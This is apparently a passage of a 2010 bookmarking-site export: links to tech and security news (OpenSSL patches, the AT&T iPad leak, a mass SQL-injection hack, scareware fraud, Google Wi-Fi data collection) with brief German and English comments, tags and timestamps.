aktiviert.<p>Die OpenSSL-Entwickler haben die Versionen 0.9.8o und 1.0.0a vorgelegt, in denen sie nur sicherheitsrelevante Probleme gelöst haben. So lässt sich ein Fehler im ASN.1-Parser ausnutzen, um mit präparierten Strukturen einer "Cryptographic Message Syntax"-Nachricht (CMS) in nicht erlaubte Speicherbereiche zu schreiben. Möglicherweise lässt sich der Fehler ausnutzen, um Code in ein System zu schleusen und ein System zu kompromittieren. In dem OpenSSL-Zweig 0.9.8 ist CMS standardmäßig nicht aktiviert, im Zweig 1.0.0 ist es jedoch aktiviert. +</p>http://www.heise.de/security/meldung/OpenSSL-Updates-beseitigen-Schwachstellen-1014668.htmlpage_shots/2010/06/12/openssl-updates-beseitigen-schwachstellen.pngopenssl-updates-beseitigen-schwachstellen131012010-06-12 13:13:194openssl patch sslApple's Worst Security Breach: 114,000 iPad Owners ExposedWas actually a hack; one had to guess the ICC-ID of the SIM and the AT&T server responded with the e-mail address. + +Now, the FBI is investigating ...<p>Was actually a hack; one had to guess the ICC-ID of the SIM and the AT&amp;T server responded with the e-mail address. +</p> +<p>Now, the FBI is investigating ... +</p>http://gawker.com/5559346/apples-worst-security-breach-114000-ipad-owners-exposed?skyline=true&s=ipage_shots/2010/06/12/apples-worst-security-breach-114000-ipad-owners.pngapples-worst-security-breach-114000-ipad-owners161012010-06-11 23:52:344apple ipadDeleting Facebook accounts doesn't Facebook didn't close his account down. Turns out that if third-party sites (like Twitter or YouTube) make updates to your profile within 14 days of the deletion, Facebook resets the process. How about that. <p> Facebook didn't close his account down. Turns out that if third-party sites (like Twitter or YouTube) make updates to your profile within 14 days of the deletion, Facebook resets the process. How about that. +</p>http://techcrunch.com/2010/06/11/calacanis-facebook-profile/page_shots/2010/06/11/deleting-facebook-accounts-doesnt.pngdeleting-facebook-accounts-doesnt131012010-06-11 23:02:334facebook, online, privacy, social networkCrooks siphon $644,000 from school district's bank account • The RegisterTaxmoney at work. + +Cyber thieves have targeted the New York State Department of Education, +electronically draining one of the department's bank accounts of more +than US $644,000. The account, which was designated for petty cash +spending, was limited to US $500 purchases, but an oversight allowed +transfers of any amount. The thieves made transfers for more than three +years before the scheme was detected. Officials didn't discover the +problem because they neglected to reconcile their accounts regularly. +Albert Attoh was sentenced to one year in prison and ordered to pay US +$270,000 in restitution for his role in the thefts. In exchange for +payments, Attoh gave bank routing and account data to other people who +used it to pay student loans and make purchases. +<p>Taxmoney at work. +</p> +<p>Cyber thieves have targeted the New York State Department of Education, + electronically draining one of the department's bank accounts of more + than US $644,000. The account, which was designated for petty cash + spending, was limited to US $500 purchases, but an oversight allowed + transfers of any amount. The thieves made transfers for more than three + years before the scheme was detected. Officials didn't discover the + problem because they neglected to reconcile their accounts regularly. + Albert Attoh was sentenced to one year in prison and ordered to pay US + $270,000 in restitution for his role in the thefts. In exchange for + payments, Attoh gave bank routing and account data to other people who + used it to pay student loans and make purchases. +</p>http://www.theregister.co.uk/2010/06/07/electronic_account_raided/page_shots/2010/06/11/crooks-siphon-644000-from-school-districts-bank.pngcrooks-siphon-644000-from-school-districts-bank11012010-06-11 22:20:344fraudWindows Help used as attack surface - The H Security: News and Features0 day in Win (irgendwas mit Helpcenter) released von einem Google Typen namens Ormandy. Das letzte Mal hat er Monate auf einen Fix gewartet. FD, responsible Disclosure ...<p>0 day in Win (irgendwas mit Helpcenter) released von einem Google Typen namens Ormandy. Das letzte Mal hat er Monate auf einen Fix gewartet. FD, responsible Disclosure ... +</p>http://www.h-online.com/security/news/item/Windows-Help-used-as-attack-surface-1019381.htmlpage_shots/2010/06/11/windows-help-used-as-attack-surface-the-h-securi.pngwindows-help-used-as-attack-surface-the-h-securi11012010-06-11 22:18:1340day exploit microsoft windowsMass hack plants malware on thousands of webpages • The RegisterSportlich: 100.000 IIS + MSSQL + ASP 0wn3d + +Tens of thousands of web pages have been infected with malicious HTML +code that redirects visitors to a web server that tries to download +malware onto their computers. The attacks have compromised web pages +on several high-profile sites, including The Wall Street Journal and The +Jerusalem Post. While researchers do not yet have a definitive answer +as to the nature of the attacks, there is strong suspicion that an SQL +injection attack was used. All the affected web sites appear to be +running Microsoft Internet Information Services Web-server software with +Active Server Pages. The number of affected pages has dropped +significantly since the attack was first detected. +<p>Sportlich: 100.000 IIS + MSSQL + ASP 0wn3d +</p> +<p>Tens of thousands of web pages have been infected with malicious HTML + code that redirects visitors to a web server that tries to download + malware onto their computers. The attacks have compromised web pages + on several high-profile sites, including The Wall Street Journal and The + Jerusalem Post. While researchers do not yet have a definitive answer + as to the nature of the attacks, there is strong suspicion that an SQL + injection attack was used. All the affected web sites appear to be + running Microsoft Internet Information Services Web-server software with + Active Server Pages. The number of affected pages has dropped + significantly since the attack was first detected. +</p>http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/page_shots/2010/06/11/mass-hack-plants-malware-on-thousands-of-webpages.pngmass-hack-plants-malware-on-thousands-of-webpages11012010-06-11 22:15:014malwareMicrosoft explains mystery Firefox extension, &quot;fixes&quot; updateMS Security update installs Firefox called Search Helper Extension. Uninstall quite difficult.<p>MS Security update installs Firefox called Search Helper Extension. Uninstall quite difficult. +</p>http://arstechnica.com/microsoft/news/2010/06/microsoft-explains-mystery-firefox-extension-fixes-update-1.arspage_shots/2010/06/11/microsoft-explains-mystery-firefox-extension-quo.pngmicrosoft-explains-mystery-firefox-extension-quo11012010-06-11 22:11:414firefox microsoft windows31/05/10 - Consultation on development of a data security breach code of practice - Data Protection Commissioner - Irelandausbaufähiges Model für .de. + +The Irish Data Protection Commissioner has published a draft security +breach code of practice that, if adopted, would require any data breach +involving information belonging to more than 100 people be reported to +the Data Protection Commissioner. Organizations would be exempt from +the requirement if they demonstrate that the compromised data are +protected by strong security measures or if the breach affects +non-sensitive information or small amounts of personal information.<p>ausbaufähiges Model für .de. +</p> +<p>The Irish Data Protection Commissioner has published a draft security + breach code of practice that, if adopted, would require any data breach + involving information belonging to more than 100 people be reported to + the Data Protection Commissioner. Organizations would be exempt from + the requirement if they demonstrate that the compromised data are + protected by strong security measures or if the breach affects + non-sensitive information or small amounts of personal information. +</p>http://www.dataprotection.ie/viewdoc.asp?DocID=1077&m=fpage_shots/2010/06/11/310510-consultation-on-development-of-a-data-s.png310510-consultation-on-development-of-a-data-s11012010-06-11 22:03:234datalossAdobe - Security Advisories: Security Advisory for Flash Player, Adobe Reader and AcrobatWird echt Zeit, dass das ausstirbt. + + +Adobe will issue a fix for a critical zero-day vulnerability in Flash +on Thursday, June 10, but a patch for the same flaw in Adobe Reader and +Acrobat will not be made available until later in the month. The Flash +vulnerability is being addressed first because it is more likely to be +exploited without user interaction. The flaw is already being actively +exploited through specially-crafted PDF documents. Adobe has +*accelerated* its scheduled July 13 quarterly update by two weeks and +plans to release security updates for Reader and Acrobat on June 29. +<p>Wird echt Zeit, dass das ausstirbt. +</p> +<p>Adobe will issue a fix for a critical zero-day vulnerability in Flash + on Thursday, June 10, but a patch for the same flaw in Adobe Reader and + Acrobat will not be made available until later in the month. The Flash + vulnerability is being addressed first because it is more likely to be + exploited without user interaction. The flaw is already being actively + exploited through specially-crafted PDF documents. Adobe has + <em>accelerated</em> its scheduled July 13 quarterly update by two weeks and + plans to release security updates for Reader and Acrobat on June 29. +</p>http://www.adobe.com/support/security/advisories/apsa10-01.htmlpage_shots/2010/06/11/adobe-security-advisories-security-advisory-for.pngadobe-security-advisories-security-advisory-for11012010-06-11 21:59:554adobe flash pdf vulnerabilityLinux Today - Memo From Dell: Ubuntu Linux Safer Than Microsoft WindowsReminds me of a comment on the BBT Ubuntu commercial: Only lamers have Win. + +Update: [s/Ubuntu is more secure/Ubuntu is secure/](http://www.heise.de/open/meldung/Dell-wirbt-ein-bisschen-weniger-fuer-Linux-1025074.html)<p>Reminds me of a comment on the BBT Ubuntu commercial: Only lamers have Win. +</p> +<p>Update: <a href="http://www.heise.de/open/meldung/Dell-wirbt-ein-bisschen-weniger-fuer-Linux-1025074.html">s/Ubuntu is more secure/Ubuntu is secure/</a> +</p>http://www.linuxtoday.com/news_story.php3?ltsn=2010-06-11-005-39-OP-MS-UBpage_shots/2010/06/18/linux-today-memo-from-dell-ubuntu-linux-safer-t_.pnglinux-today-memo-from-dell-ubuntu-linux-safer-t11012010-06-11 15:05:404linux microsoft ubuntu windowsApple Outsider Hello, LuaSieht so aus, als ob Apple interpretierte Sprachen auf dem iPhone zu läßt - zumindest nicht mehr kategorisch ausschließt.<p>Sieht so aus, als ob Apple interpretierte Sprachen auf dem iPhone zu läßt - zumindest nicht mehr kategorisch ausschließt. +</p>http://www.appleoutsider.com/2010/06/10/hello-lua/page_shots/2010/06/11/apple-outsider-raquo-hello-lua_.pngapple-outsider-raquo-hello-lua11012010-06-11 13:08:454apple iphoneSCOwned: no new trial, Novell can shut down IBM lawsuitSCO tried again. Judge said no. Hopefully that is the end of this stroy.<p>SCO tried again. Judge said no. Hopefully that is the end of this stroy. +</p>http://arstechnica.com/tech-policy/news/2010/06/scowned-no-new-trial-novell-can-shut-down-ibm-lawsuit.arspage_shots/2010/06/11/scowned-no-new-trial-novell-can-shut-down-ibm-la.pngscowned-no-new-trial-novell-can-shut-down-ibm-la11012010-06-11 12:40:164microsoft scoHintergrund zum exFAT Treiber von TuxeraNutzung soll $ 25,- teuer werden. MS verbreitet FUD<p>Nutzung soll $ 25,- teuer werden. MS verbreitet FUD +</p>http://www.heise.de/open/artikel/Die-Woche-Ein-Patent-mit-grosser-Zukunft-1015259.htmlpage_shots/2010/06/11/hintergrund-zum-exfat-treiber-von-tuxera.pnghintergrund-zum-exfat-treiber-von-tuxera11012010-06-11 11:53:174foss microsoft patent + Which companies are phasing out PVC and BFRs | Greenpeace International +Which companies are phasing out PVC and BFRs<p>Which companies are phasing out PVC and BFRs +</p>http://www.greenpeace.org/international/en/campaigns/toxics/electronics/Guide-to-Greener-Electronics/which-companies-really-sell-gr/page_shots/2010/06/09/which-companies-are-phasing-out-pvc-and-bfrs.pngwhich-companies-are-phasing-out-pvc-and-bfrs11012010-06-09 21:14:334environment greenpeace toxicOlympus Stylus Tough camera carries malware infection | Graham Cluley&#39;s blogWie auch [Samsung](http://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.html) pre-0wned device (camera this time).<p>Wie auch <a href="http://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.html">Samsung</a> pre-0wned device (camera this time). +</p>http://www.sophos.com/blogs/gc/g/2010/06/08/olympus-stylus-tough-camera-carries-malware-infection/page_shots/2010/06/09/olympus-stylus-tough-camera-carries-malware-infect.pngolympus-stylus-tough-camera-carries-malware-infect11012010-06-09 15:21:584pre0wned virusFoxconn Scrapping Suicide Compensation To Stop DeathsDas ist da wo die ganzen Teilchen herkommen.<p>Das ist da wo die ganzen Teilchen herkommen. +</p>http://gizmodo.com/5558920/foxconn-scrapping-suicide-compensation-to-stop-deathspage_shots/2010/06/09/foxconn-scrapping-suicide-compensation-to-stop-dea.pngfoxconn-scrapping-suicide-compensation-to-stop-dea11012010-06-09 15:05:364suicideheise online - 15 Jahre PHPEvolution braucht echt lange... + +[fukami@twitter](http://twitter.com/fukami/status/15698118094) Glückwunsch zu 11.870 Sicherheitslöchern in 15 Jahren PHP [BTW knapp 1/4 aller Einträge bei NIST](http://nvd.nist.gov/) + +[Lerdorf wikiquotes](http://en.wikiquote.org/wiki/Rasmus_Lerdorf) mit Perlen wie _There are people who actually like programming. I don't understand why they like programming._<p>Evolution braucht echt lange... +</p> +<p><a href="http://twitter.com/fukami/status/15698118094">fukami@twitter</a> Glückwunsch zu 11.870 Sicherheitslöchern in 15 Jahren PHP <a href="http://nvd.nist.gov/">BTW knapp 1/4 aller Einträge bei NIST</a> +</p> +<p><a href="http://en.wikiquote.org/wiki/Rasmus_Lerdorf">Lerdorf wikiquotes</a> mit Perlen wie <em>There are people who actually like programming. I don't understand why they like programming.</em> +</p>http://www.heise.de/newsticker/meldung/15-Jahre-PHP-1017276.htmlpage_shots/2010/06/08/heise-online-15-jahre-php___.pngheise-online-15-jahre-php11012010-06-08 14:37:004phpGoogle tries to patent tech that snoops Wi-Fi networks • The RegisterGoogle patents war-driving.<p>Google patents war-driving. +</p>http://www.theregister.co.uk/2010/06/03/google_wardriving_patent/page_shots/2010/06/07/google-tries-to-patent-tech-that-snoops-wi-fi-netw.pnggoogle-tries-to-patent-tech-that-snoops-wi-fi-netw11012010-06-07 23:24:264google patent wardriving3 men charged in $100m scareware scam • The RegisterThree men have been indicted for allegedly running a scareware scheme +that took in more than US *$100 million*. The trio allegedly established +phony Internet advertising agencies to get their infected ads onto +websites. The code hidden in the ads redirected users' browsers to +maliciously crafted websites where they were greeted with pop-up windows +telling them their computers were infected with malware and that they +needed to purchase software to fix the problems. The phony anti-virus +software cost between US $30 and US $70. The US Federal Trade +Commission (FTC) filed similar charges against operators of the same +companies in 2008. Shaileshkumar P. Jain, Bjorn Daniel Sundin and James +Reno are all facing charges of wire fraud, computer fraud, and +conspiracy to commit computer fraud. +<p>Three men have been indicted for allegedly running a scareware scheme + that took in more than US <em>$100 million</em>. The trio allegedly established + phony Internet advertising agencies to get their infected ads onto + websites. The code hidden in the ads redirected users' browsers to + maliciously crafted websites where they were greeted with pop-up windows + telling them their computers were infected with malware and that they + needed to purchase software to fix the problems. The phony anti-virus + software cost between US $30 and US $70. The US Federal Trade + Commission (FTC) filed similar charges against operators of the same + companies in 2008. Shaileshkumar P. Jain, Bjorn Daniel Sundin and James + Reno are all facing charges of wire fraud, computer fraud, and + conspiracy to commit computer fraud. +</p>http://www.theregister.co.uk/2010/05/28/scarware_scam_charges/page_shots/2010/06/07/3-men-charged-in-100m-scareware-scam-the-regist.png3-men-charged-in-100m-scareware-scam-the-regist11012010-06-07 23:16:074fraud malware scareware FTC asks Google not to destroy documents about Wi-Fi data collection - latimes.comSind Daten erst mal da ... Was wollen Regierungen oder die FTC damit? + +The Federal Trade Commission (FTC) has asked Google not to destroy any +of the documents about data it collected from unsecured Wi-Fi networks +in 33 countries while trolling for images for its Street View feature. +Google maintains the 600 gigabytes of "fragmentary data" were collected +inadvertently. Google has already destroyed data collected in Denmark, +Ireland and Austria after the countries requested that action. Google +has yet to surrender the information to regulators in any of the +countries. +<p>Sind Daten erst mal da ... Was wollen Regierungen oder die FTC damit? +</p> +<p>The Federal Trade Commission (FTC) has asked Google not to destroy any + of the documents about data it collected from unsecured Wi-Fi networks + in 33 countries while trolling for images for its Street View feature. + Google maintains the 600 gigabytes of "fragmentary data" were collected + inadvertently. Google has already destroyed data collected in Denmark, + Ireland and Austria after the countries requested that action. Google + has yet to surrender the information to regulators in any of the + countries. +</p>http://www.latimes.com/business/la-fi-google-20100528,0,4596451.storypage_shots/2010/06/07/ftc-asks-google-not-to-destroy-documents-about-wi_.pngftc-asks-google-not-to-destroy-documents-about-wi11012010-06-07 23:12:304dataloss googleU.S. intelligence analyst investigated for allegedly divulging classified informationManner soll der Collateral Damage Leaker gewesen sein. Das hat er seinem Kumpel Lamo, einem Ex-Hacker (New York Times Accounts gehackt) erzählt. Fefe vermutet, das ist um WL zu diskreditieren. Der Wired-Autor: Passt übrigens prächtig, denn Poulson war auch derjenige, der kürzlich in Wired diese Agitprop-Story gebracht hatte, dass Wikileaks ihre Informationen illegitim aus Tor-Sniffing erlangt hätten, was sowohl Tor als auch Wikileaks dementieren. +Interessant auch, dass die Washingtom Post wohl ein Jahr das Video hatte.<p>Manner soll der Collateral Damage Leaker gewesen sein. Das hat er seinem Kumpel Lamo, einem Ex-Hacker (New York Times Accounts gehackt) erzählt. Fefe vermutet, das ist um WL zu diskreditieren. Der Wired-Autor: Passt übrigens prächtig, denn Poulson war auch derjenige, der kürzlich in Wired diese Agitprop-Story gebracht hatte, dass Wikileaks ihre Informationen illegitim aus Tor-Sniffing erlangt hätten, was sowohl Tor als auch Wikileaks dementieren. + Interessant auch, dass die Washingtom Post wohl ein Jahr das Video hatte. +</p>http://www.washingtonpost.com/wp-dyn/content/article/2010/06/07/AR2010060702381_2.htmlpage_shots/2010/06/07/us-intelligence-analyst-investigated-for-alleged_.pngus-intelligence-analyst-investigated-for-alleged11012010-06-07 22:12:074wikileaksFake gegen Fake: Wie die Horst-Köhler-Satire verschwand - taz.deAuf der Seite horst-koehler-consulting.de bot vermeintlich der Bundespräsident a.D. Horst Köhler Unternehmen Beratung auf Basis seiner militär- und außenhandelspolitischen Kompetenzen an. Zu seinem Kompetenzteam sollten unter anderem Ex-Bundeskanzler Gerhard Schröder, verantwortlich für „Putin Relations“, Ex-Außenminister Joschka Fischer, verantwortlich für „Green Warfare“, sowie Ex-Bundeskanzler Kohl, als „Head of Secret Accountance“ zählen – die Seite mussten für jeden klar als Satire zu erkennen sein. + +Die Website schaffte es auf bis zu 2.000 Klicks pro Sekunde. Doch: Nur wenige Stunden nach Veröffentlichung verschwand sie wieder aus dem Netz. Unter der URL war sie zwischenzeitlich nicht mehr zu finden und selbst im Google Cache, dem Kurzzeitgedächtnis des Suchportals, war sie bereits nach wenigen Stunden verschwunden.<p>Auf der Seite horst-koehler-consulting.de bot vermeintlich der Bundespräsident a.D. Horst Köhler Unternehmen Beratung auf Basis seiner militär- und außenhandelspolitischen Kompetenzen an. Zu seinem Kompetenzteam sollten unter anderem Ex-Bundeskanzler Gerhard Schröder, verantwortlich für „Putin Relations“, Ex-Außenminister Joschka Fischer, verantwortlich für „Green Warfare“, sowie Ex-Bundeskanzler Kohl, als „Head of Secret Accountance“ zählen – die Seite mussten für jeden klar als Satire zu erkennen sein. +</p> +<p>Die Website schaffte es auf bis zu 2.000 Klicks pro Sekunde. Doch: Nur wenige Stunden nach Veröffentlichung verschwand sie wieder aus dem Netz. Unter der URL war sie zwischenzeitlich nicht mehr zu finden und selbst im Google Cache, dem Kurzzeitgedächtnis des Suchportals, war sie bereits nach wenigen Stunden verschwunden. +</p>http://www.taz.de/1/netz/netzkultur/artikel/1/wie-die-horst-koehler-satire-verschwand/page_shots/2010/06/07/fake-gegen-fake-wie-die-horst-kohler-satire-versc.pngfake-gegen-fake-wie-die-horst-kohler-satire-versc11012010-06-07 00:15:204Russia’s Anti-Spam Chief Faces Spamming Charges - SPAMfighterhttp://www.spamfighter.com/News-14502-Russias-Anti-Spam-Chief-Faces-Spamming-Charges.htmpage_shots/2010/06/07/russias-anti-spam-chief-faces-spamming-charges.pngrussias-anti-spam-chief-faces-spamming-charges11012010-06-05 08:43:494spamNicht nur nackte Tatsachen: Was Apple alles zensiert - n-tv.dehttp://www.n-tv.de/technik/Was-Apple-alles-zensiert-article904627.htmlpage_shots/2010/06/05/nicht-nur-nackte-tatsachen-was-apple-alles-zensie.pngnicht-nur-nackte-tatsachen-was-apple-alles-zensie11012010-06-05 08:35:254heise online - Samsung Wave mit Virus ab Werk - aber nur in Deutschlandhttp://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.htmlpage_shots/2010/06/03/heise-online-samsung-wave-mit-virus-ab-werk-ab.pngheise-online-samsung-wave-mit-virus-ab-werk-ab11012010-06-03 17:27:544Slashdot Technology Story | EU To Monitor All Internet SearchesNatürli gegen kipo. + +"The European Parliament is issuing a written declaration about the need to set up an early warning system to combat sexual child abuse. However, the substance of the declaration is to extend the EU data retention directive to search engines, so that all searches done on for example Google will be monitored. If you are a citizen concerned about the right to privacy and freedom on the Internet, you can help by sending e-mail to the MEPs from your country and explaining the issue to them."<p>Natürli gegen kipo. +</p> +<p>"The European Parliament is issuing a written declaration about the need to set up an early warning system to combat sexual child abuse. However, the substance of the declaration is to extend the EU data retention directive to search engines, so that all searches done on for example Google will be monitored. If you are a citizen concerned about the right to privacy and freedom on the Internet, you can help by sending e-mail to the MEPs from your country and explaining the issue to them." +</p>http://tech.slashdot.org/story/10/06/02/2317241/EU-To-Monitor-All-Internet-Searchespage_shots/2010/06/03/slashdot-technology-story-eu-to-monitor-all-inte_.pngslashdot-technology-story-eu-to-monitor-all-inte11012010-06-03 10:55:054heise online - Luc Besson arbeitet bei neuem Film mit Internet-Community zusammen Zumindest ein aufeinander zu gehen. in Sendung etwas disutieren.<p>Zumindest ein aufeinander zu gehen. in Sendung etwas disutieren. +</p>http://www.heise.de/newsticker/meldung/Luc-Besson-arbeitet-bei-neuem-Film-mit-Internet-Community-zusammen-1013701.htmlpage_shots/2010/06/03/heise-online-luc-besson-arbeitet-bei-neuem-film.pngheise-online-luc-besson-arbeitet-bei-neuem-film11012010-06-03 10:34:554Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.<p>Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability. +</p>http://packetstormsecurity.org/filedesc/trendmicrodlp-dataleakage.pdf.htmlpage_shots/2010/06/02/trend-micro-data-loss-prevention-version-52-suffe.pngtrend-micro-data-loss-prevention-version-52-suffe11012010-06-02 11:33:544no more win at googleGoogle verbannt ms Win aus dem Unternehmen. noch os x und linux. grund: Sicherheit. hmm m(<p>Google verbannt ms Win aus dem Unternehmen. noch os x und linux. grund: Sicherheit. hmm m( +</p>http://futurezone.orf.at/stories/1649477/page_shots/2010/06/07/no-more-win-at-google.pngno-more-win-at-google11012010-06-01 11:04:474google microsoft windowsdas grosse Löschen80 bis 90 prozent muss z. b. beim wdr gelöscht werden<p>80 bis 90 prozent muss z. b. beim wdr gelöscht werden +</p>http://www.wdr.de/themen/kultur/medien/staatsvertrag_zwoelfter/verweildauer.jhtmlpage_shots/2010/06/01/das-grosse-loschen.pngdas-grosse-loschen11012010-06-01 11:01:574Webcam knows how to snub shoulder surfersbuild in camera to detect shoulder surfing<p>build in camera to detect shoulder surfing +</p>http://www.newscientist.com/article/mg20627624.100-webcam-knows-how-to-snub-shoulder-surfers.htmlpage_shots/2010/06/01/webcam-knows-how-to-snub-shoulder-surfers-tech_.pngwebcam-knows-how-to-snub-shoulder-surfers-tech11012010-06-01 09:12:304Blogs stürzen Bundespräsident?Interessante These: +Der Rücktritt von Horst Köhler ist nicht nur der erste Rücktritt eines Bundespräsidenten mit sofortiger Wirkung, sondern auch ein Rücktritt unter maßgeblicher Blog-Beteiligung. Denn die Thematisierung seiner Formulierung von den “freien Handelswege” verlief in bemerkenswerten Wellen. Dabei wurde das Thema zuerst von Blogs aufgegriffen und als Skandal identifiziert.<p>Interessante These: + Der Rücktritt von Horst Köhler ist nicht nur der erste Rücktritt eines Bundespräsidenten mit sofortiger Wirkung, sondern auch ein Rücktritt unter maßgeblicher Blog-Beteiligung. Denn die Thematisierung seiner Formulierung von den “freien Handelswege” verlief in bemerkenswerten Wellen. Dabei wurde das Thema zuerst von Blogs aufgegriffen und als Skandal identifiziert. +</p>http://carta.info/28218/horst-koehler-ein-ruecktritt-unter-blog-mitwirkung/page_shots/2010/06/07/no_page_shot.pngblogs-stuerzen-bundeskanzer151012010-05-31 23:08:104blogFreie Bahn für SoftwarepatenteDer Bundesgerichtshof sieht praktisch jedes Verfahren, das sich als Computerprogramm implementieren lässt, als technisch und somit patentierbar an. Das geht aus einem aktuellen Beschluss zu einer Patentanmeldung für die "dynamische Dokumentengenerierung" hervor. +Mit diesem Beschluss hat der BGH eine anderslautende Entscheidung des Bundespatentgerichts vom 17. Januar 2008 aufgehoben. Dieses hatte die Siemens-Patentanmeldung DE 102 32 674.6 mit dem Titel "Verfahren zur dynamischen Generierung strukturierter Dokumente" wegen des Fehlens einer erfinderischen Tätigkeit abgelehnt.<p>Der Bundesgerichtshof sieht praktisch jedes Verfahren, das sich als Computerprogramm implementieren lässt, als technisch und somit patentierbar an. Das geht aus einem aktuellen Beschluss zu einer Patentanmeldung für die "dynamische Dokumentengenerierung" hervor. + Mit diesem Beschluss hat der BGH eine anderslautende Entscheidung des Bundespatentgerichts vom 17. Januar 2008 aufgehoben. Dieses hatte die Siemens-Patentanmeldung DE 102 32 674.6 mit dem Titel "Verfahren zur dynamischen Generierung strukturierter Dokumente" wegen des Fehlens einer erfinderischen Tätigkeit abgelehnt. +</p>http://www.golem.de/1005/75277.htmlpage_shots/2010/05/31/freie-bahn-fur-softwarepatente.pngfreie-bahn-fur-softwarepatente151012010-05-31 21:57:504iPhone gibt Daten an fremde Rechner weiterThe Any iPhone Backup + +Auch gesperrte Daten (z.B. Passwörter, SMS) lassen sich aus iPhone auslesen wenn sie an fremden PC (z.B. mit iTunes) angeschlossen würden… + +(http://heise-online.mobi/security/meldung/Luecke-in-Datenverschluesselung-des-iPhones-1007818.html) +<p>The Any iPhone Backup +</p> +<p>Auch gesperrte Daten (z.B. Passwörter, SMS) lassen sich aus iPhone auslesen wenn sie an fremden PC (z.B. mit iTunes) angeschlossen würden… +</p> +<p>(http://heise-online.mobi/security/meldung/Luecke-in-Datenverschluesselung-des-iPhones-1007818.html) +</p>http://www.heise.de/newsticker/meldung/iPhone-Leck-weitet-sich-aus-1012473.html/from/atom10page_shots/2010/06/01/iphone-gibt-daten-an-fremde-rechner-weiter_.pngiphone-gibt-daten-an-fremde-rechner-weiter151012010-05-31 20:19:024apple iphonefacebook-telefonbuch-grabscheriPhone App downloaded das Adressbuch, genannt *Telefonbuchgrabscher* bei SpOn<p>iPhone App downloaded das Adressbuch, genannt <em>Telefonbuchgrabscher</em> bei SpOn +</p>http://www.spiegel.de/netzwelt/web/0,1518,697733,00.htmlpage_shots/2010/05/31/facebook-telefonbuch-grabscher.pngfacebook-telefonbuch-grabscher11012010-05-31 20:04:144If You See Something, Think Twice About Saying SomethingThe Travis County Criminal Justice Center was closed for most of the day on Friday, May 14, after a man reported that a "suspicious package" had been left in the building. The court complex was evacuated, and the APD Explosive Ordinance Disposal Unit was called in for a look-see. The package in question, a backpack, contained paperwork but no explosive device. The building reopened at 1:40pm. The man who reported the suspicious package, Douglas Scott Hoopes, was arrested and charged with making a false report and booked into the jail. The charge is a felony punishable by up to two years in jail.<p>The Travis County Criminal Justice Center was closed for most of the day on Friday, May 14, after a man reported that a "suspicious package" had been left in the building. The court complex was evacuated, and the APD Explosive Ordinance Disposal Unit was called in for a look-see. The package in question, a backpack, contained paperwork but no explosive device. The building reopened at 1:40pm. The man who reported the suspicious package, Douglas Scott Hoopes, was arrested and charged with making a false report and booked into the jail. The charge is a felony punishable by up to two years in jail. +</p>http://www.schneier.com/blog/archives/2010/05/if_you_see_some_1.htmlpage_shots/2010/05/30/if-you-see-something-think-twice-about-saying-som.pngif-you-see-something-think-twice-about-saying-som131012010-05-30 18:51:034heise online - Zugangsdaten von 44 Millionen Online-Spielern gestohlenhttp://www.heise.de/newsticker/meldung/Zugangsdaten-von-44-Millionen-Online-Spielern-gestohlen-1010566.htmlpage_shots/2010/05/29/heise-online-zugangsdaten-von-44-millionen-onlin.pngheise-online-zugangsdaten-von-44-millionen-onlin11012010-05-29 18:26:234voting machine @Texas Legislation http://www.youtube.com/watch?v=eG6X-xtVaskpage_shots/2010/05/28/voting-machine-texas-legislation.pngvoting-machine-texas-legislation151012010-05-28 18:24:204The Escapist : News : Warner Bros. Sued for Pirating Anti-Piracy Technologyhttp://www.escapistmagazine.com/news/view/100937-Warner-Bros-Sued-for-Pirating-Anti-Piracy-Technologypage_shots/2010/05/27/the-escapist-news-warner-bros-sued-for-pirati.pngthe-escapist-news-warner-bros-sued-for-pirati11012010-05-27 20:50:524Save the Children Finnland in Verteilung von „Kinderpornografie“ verstricktDer folgende Artikel ist eine Übersetzung eines Textes von Matti Nikki aus Finnland. Er zeigt darin, wie die Kinderschutzorganisatiom Save the Children, die maßgeblich an der Etablierung von Internet-Sperren in Finnland und anderen skandinavischen Ländern beteiligt war, über Monate hinweg selbst bei der Verteilung von „Kinderpornografie“ indirekt mitgeholfen hat. Er zeigt die Problematik des Overblocking und wie schnell man zum Verbreiter einschlägiger Inhalte werden kann<p>Der folgende Artikel ist eine Übersetzung eines Textes von Matti Nikki aus Finnland. Er zeigt darin, wie die Kinderschutzorganisatiom Save the Children, die maßgeblich an der Etablierung von Internet-Sperren in Finnland und anderen skandinavischen Ländern beteiligt war, über Monate hinweg selbst bei der Verteilung von „Kinderpornografie“ indirekt mitgeholfen hat. Er zeigt die Problematik des Overblocking und wie schnell man zum Verbreiter einschlägiger Inhalte werden kann +</p>http://ak-zensur.de/2010/04/save-the-children.htmlpage_shots/2010/05/27/save-the-children-finnland-in-verteilung-von-kind.pngsave-the-children-finnland-in-verteilung-von-kind131012010-05-27 16:46:464heise online - Forscher infiziert sich mit ComputervirusEin britischer Forscher hat sich einen RFID-Chip implantiert, der Code für einen Computervirus enthält. Der Virus soll RFID-Lesegeräte infizieren und sich darüber wiederum in weitere RFID-Chips schreiben können. + +In ersten Versuchen seines Proof-of-Concept soll es Mark Gasson von der Universität Reading bereits gelungen sein, seinen Virus über den in einen Finger implantierten Chip auf andere Systeme zu übertragen. Gasson, der unter anderem mit seinen Arbeiten zur Kopplung des menschlichen Nervensystems mit Computern bekannt wurde, will mit seinen Versuchen auf die Risiken der sich verbreitenden medizinischen RFID-Implantate aufmerksam machen.<p>Ein britischer Forscher hat sich einen RFID-Chip implantiert, der Code für einen Computervirus enthält. Der Virus soll RFID-Lesegeräte infizieren und sich darüber wiederum in weitere RFID-Chips schreiben können. +</p> +<p>In ersten Versuchen seines Proof-of-Concept soll es Mark Gasson von der Universität Reading bereits gelungen sein, seinen Virus über den in einen Finger implantierten Chip auf andere Systeme zu übertragen. Gasson, der unter anderem mit seinen Arbeiten zur Kopplung des menschlichen Nervensystems mit Computern bekannt wurde, will mit seinen Versuchen auf die Risiken der sich verbreitenden medizinischen RFID-Implantate aufmerksam machen. 